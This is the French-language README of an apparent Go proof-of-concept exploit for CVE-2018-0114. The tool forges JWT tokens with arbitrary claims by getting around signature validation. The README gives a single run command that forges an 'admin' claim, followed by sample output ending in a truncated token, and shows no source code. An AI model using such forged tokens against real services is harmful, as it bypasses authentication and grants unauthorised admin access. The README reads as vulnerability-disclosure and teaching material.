
Exploit de preuve de concept pour CVE-2018-0114 qui génère des jetons JWT falsifiés avec des revendications arbitraires, démontrant une vulnérabilité de contournement de validation de signature.
Référence : CVE-2018-0114
Note : À des fins éducatives uniquement.
Pour générer un JWT avec la revendication "admin", exécutez la commande suivante dans le répertoire du projet :
go run . --claim=admin
____ __ __ ____ ___ __ _ __ __ _ _ __ __
/\ _`\ /\ \/\ \ /\ _`\ /'___`\ /'__`\ /' \ /'_ `\ /'__`\ /' \ /' \ /\ \\ \
\ \ \/\_\ \ \ \ \ \ \ \ \L\_\ /\_\ /\ \ /\ \/\ \ /\_, \ /\ \L\ \ /\ \/\ \ /\_, \ /\_, \ \ \ \\ \
\ \ \/_/_ \ \ \ \ \ \ \ _\L _______ \/_/// /__ \ \ \ \ \ \/_/\ \ \/_> _ <_ _______ \ \ \ \ \ \/_/\ \ \/_/\ \ \ \ \\ \_
\ \ \L\ \ \ \ \_/ \ \ \ \L\ \/\______\ // /_\ \ \ \ \_\ \ \ \ \ /\ \L\ \/\______\ \ \ \_\ \ \ \ \ \ \ \ \ \__ ,__\
\ \____/ \ `\___/ \ \____/\/______/ /\______/ \ \____/ \ \_\ \ \____/\/______/ \ \____/ \ \_\ \ \_\ \/_/\_\_/
\/___/ `\/__/ \/___/ \/_____/ \/___/ \/_/ \/___/ \/___/ \/_/ \/_/ \/_/
[x] Generating JWT with payload "admin" ...
[x] Keys Generated
[x] Signature Signed
eyJhbGciOiJSUzI1NiIsI.......